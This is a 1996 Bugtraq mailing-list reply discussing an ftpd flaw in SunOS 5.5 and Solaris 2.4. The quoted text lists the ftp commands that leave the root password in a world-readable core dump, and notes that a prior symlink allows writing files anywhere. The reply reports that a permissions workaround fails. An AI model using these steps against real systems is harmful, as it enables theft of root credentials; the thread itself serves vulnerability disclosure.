[3480] in bugtraq

home help back first fref pref prev next nref lref last post

Re: ftpd bug? Was: bin/1805: Bug in ftpd

daemon@ATHENA.MIT.EDU (Doug Williams)
Wed Oct 16 21:00:58 1996

Date: 	Wed, 16 Oct 1996 14:22:06 -0400
Reply-To: Doug Williams <dougw@ncccs.cc.nc.us>
From: Doug Williams <dougw@ncccs.cc.nc.us>
X-To:         Micah Brandon <brandon@eniac.vv.com>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To:  <Pine.SCO.3.95.961016141119.5644A-100000@sco.ncccs.cc.nc.us>

>
> > > SunOS 5.5:
> > >
> > > logon via ftp with your regular user/password,
> > > ftp> cd /tmp
> > > ftp> user root wrongpasswd
> > > ftp> quote pasv
> > >
> > > voila, root password in world readable core dump under /tmp
> > >
> >         I was able to create this core file under Solaris 2.4 as well...and
> > if I took the time to create a symbolic link before doing the above
> > procedure, I was able to create files anywhere on the system :(
> >
>
> I got the same on Solaris 2.4.  Being swamped right now I thought I might
> create an empty "core" in /tmp and permissions to 000.  When doing the ftp
> exploit it fills/replaces the core file, but leaves the permissions
> intact.   ...Maybe this soft patch will hold for a bit?
>

*POOOWWWWW*    (delusional patch blow)

Ummmmm... never mind, I'm a dolt.  I was able to surf around until I found
another 777 directory and Voila!

home help back first fref pref prev next nref lref last post